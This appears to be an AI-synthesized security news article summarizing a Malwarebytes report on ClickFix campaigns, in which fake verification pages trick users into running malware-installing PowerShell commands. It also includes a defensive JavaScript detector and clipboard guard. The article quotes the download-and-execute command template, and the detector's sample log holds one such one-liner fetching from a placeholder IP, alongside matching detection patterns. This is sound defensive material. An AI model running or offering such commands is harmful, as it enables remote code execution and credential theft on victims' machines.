VYPR
Research · Published Jul 2, 2026 · 1 source

Fake Verification Pages Trick Users into Spreading Malware

Malwarebytes Labs reports on ClickFix campaigns using fake Google and Cloudflare verification pages to trick users into executing malicious commands, distributing multiple malware families.

Malwarebytes Labs has detailed evolving ClickFix campaigns that leverage deceptive Google and Cloudflare verification pages to manipulate victims into executing malicious commands on their own systems. These sophisticated attacks aim to install a variety of malware, including credential stealers, remote access trojans, and further payload delivery mechanisms. The campaign's infrastructure and delivery methods are constantly being refined, with attackers utilizing compromised websites and Cloudflare R2 buckets to distribute malicious payloads.

Victims are lured to fake verification pages, often impersonating legitimate services like Google reCAPTCHA or Cloudflare's human verification prompts. These pages pressure users to copy a PowerShell command and paste it into a command prompt on their own machine, under the guise of proving they are human or resolving an issue. In reality, the command downloads and executes malware. The Malwarebytes report highlights that legitimate services like Google, Cloudflare, and Microsoft never ask users to run commands in PowerShell to prove they are human.

The technical analysis reveals shared infrastructure across multiple campaigns, characterized by the use of specific directories like C:\ProgramData\Zooms, similar PowerShell command patterns, Cloudflare R2 buckets for payload delivery, and specific IP addresses in the ASN of Dedik Services Limited. While these indicators can change, they provide a consistent fingerprint for identifying these ongoing operations. The final malicious command often follows the pattern powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)", where irm (Invoke-RestMethod) fetches a script from a bare IP:port origin and iex (Invoke-Expression) evaluates it in memory, so no script file ever touches disk.

Attackers employ various distribution methods, including repurposed older domains, Cloudflare Pages with .pages.dev subdomains, and compromised websites. Some lures impersonate Google's reCAPTCHA or display "Manual Verification Required" messages, while others use obfuscated HTML code on Cloudflare Pages to hide the malicious PowerShell commands. In some instances, the campaigns have also distributed decoys related to unauthorized Google logins, further exploiting user trust.

A notable feature observed in some ClickFix kits is an "approval gate," which allows the attacker to manually select the command the victim will execute. This adds a layer of control and customization to the attack. The variety of malware families distributed is extensive, including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer. One observed infection chain involved a trojanized version of the Franz messaging app downloading a loader named ResiLoader, which disables security software before deploying the StealC infostealer.

To protect against these threats, users are advised to never copy and run commands from untrusted websites, be skeptical of verification pages, and keep security software updated. Unexpected technical instructions, especially those involving command-line interfaces like PowerShell, should be treated with extreme caution and verified through official channels. Malwarebytes Browser Guard is also highlighted as a tool that can warn users when a website attempts to copy content to their clipboard, a common tactic in ClickFix attacks.
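The following is an added example, not code from Malwarebytes or Vypr, that ties the two technical points above together: a small classifier for the iex(irm ...) command pattern and its reported indicators (-UseBasicParsing, a bare IP:port origin, the C:\ProgramData\Zooms directory), applied first to constructed process-creation command lines as a SOC would and then as a browser-side clipboard guard of the kind Browser Guard's warning describes. The hidden-window/-NoProfile indicator, the -EncodedCommand decoding and the sample command lines are assumptions for illustration and are not taken from the report.

```javascript
// Added example (not Malwarebytes' or Vypr's code). Indicators follow the
// report: iex(irm ...) with -UseBasicParsing, a bare IP:port origin and the
// C:\ProgramData\Zooms staging directory. The hidden-window/-NoProfile
// indicator and the -EncodedCommand decoding are assumptions about common
// PowerShell one-liner variants, not something the report states.

const DOWNLOAD = /\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b/i;
const EXECUTE = /\b(iex|invoke-expression)\b/i;

const INDICATORS = [
  { id: 'iex-irm', test: s => DOWNLOAD.test(s) && EXECUTE.test(s),
    why: 'fetches remote content and evaluates it in place' },
  { id: 'basicparsing', test: s => /-usebasicparsing\b/i.test(s),
    why: '-UseBasicParsing, as in the reported command pattern' },
  { id: 'ip-port', test: s => /(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\/\S+/.test(s),
    why: 'payload origin is a bare IP:port rather than a hostname' },
  { id: 'zooms-dir', test: s => /programdata\\+zooms\b/i.test(s),
    why: 'C:\\ProgramData\\Zooms staging directory reported across campaigns' },
  { id: 'hidden-window', test: s => /-w(?:indowstyle)?\s+hidden\b|-nop(?:rofile)?\b/i.test(s),
    why: 'hides the console or skips the profile (assumption: common one-liner flags)' },
];

// -EncodedCommand payloads are base64 of UTF-16LE text; decode them so the
// indicators are applied to what PowerShell would actually run. (Assumption:
// this variant is not described in the report but is common in the wild.)
function decodeEncodedCommand(cmd) {
  const m = /-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+\/=]{16,})/i.exec(cmd);
  return m ? Buffer.from(m[1], 'base64').toString('utf16le') : null;
}

function classifyCommand(text) {
  const decoded = decodeEncodedCommand(text);
  const hits = new Map();
  for (const view of decoded ? [text, decoded] : [text]) {
    for (const ind of INDICATORS) if (ind.test(view)) hits.set(ind.id, ind.why);
  }
  // Download-and-evaluate alone is enough to flag; the remaining indicators
  // only corroborate each other, so a lone -NoProfile or -UseBasicParsing
  // (both common in benign scripts) is not flagged.
  const suspicious = hits.has('iex-irm') || hits.size >= 2;
  return { suspicious, indicators: [...hits.keys()], reasons: [...hits.values()], decoded };
}

// Constructed process-creation command lines (not real telemetry): one
// ClickFix one-liner, one staging step using the reported directory, and one
// benign administrative invocation.
const SAMPLE_LOG = [
  `powershell -c "iex(irm '203.0.113.10:8080/a9f3k2' -UseBasicParsing)"`,
  `powershell -w hidden -c "New-Item -Force -ItemType Directory 'C:\\ProgramData\\Zooms'"`,
  `"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -NoProfile -Command "Get-Process"`,
];

// Returns only the entries the classifier flags, with the reasons attached.
function scanProcessLog(lines = SAMPLE_LOG) {
  return lines.map(line => ({ line, verdict: classifyCommand(line) }))
              .filter(e => e.verdict.suspicious);
}

// Browser-side guard in the spirit of the clipboard warning described above:
// wraps navigator.clipboard.writeText and document.execCommand('copy') on a
// window-like object, calls onSuspicious(text, verdict) and drops the write.
function installClipboardGuard(win, onSuspicious) {
  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === 'function') {
    const original = clip.writeText.bind(clip);
    clip.writeText = text => {
      const verdict = classifyCommand(String(text));
      if (!verdict.suspicious) return original(text);
      onSuspicious(String(text), verdict);
      return Promise.resolve(); // the page believes it copied; the user never gets the command
    };
  }
  const doc = win.document;
  if (doc && typeof doc.execCommand === 'function') {
    const original = doc.execCommand.bind(doc);
    doc.execCommand = (cmd, ...rest) => {
      if (String(cmd).toLowerCase() === 'copy') {
        const sel = win.getSelection ? String(win.getSelection()) : '';
        const verdict = classifyCommand(sel);
        if (verdict.suspicious) { onSuspicious(sel, verdict); return false; }
      }
      return original(cmd, ...rest);
    };
  }
}

console.log(JSON.stringify(scanProcessLog(), null, 2));
```

Run under Node to see the two flagged log lines with their reasons; in a browser the guard would be installed from an extension content script at document start with `installClipboardGuard(window, (text, v) => alert(v.reasons.join('\n')))`. The corroboration threshold is the part worth tuning: the download-and-evaluate primitive is flagged on its own, while single indicators such as -NoProfile are deliberately not, because they appear in ordinary administrative scripts.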

The ongoing evolution of ClickFix campaigns underscores the persistent threat posed by social engineering combined with built-in system tooling: no software vulnerability is exploited, the victim runs the attacker's command themselves. By impersonating trusted brands and exploiting user urgency, attackers continue to find success in tricking individuals into compromising their own systems, leading to credential theft, remote access, and full system compromise.

Synthesized by Vypr AI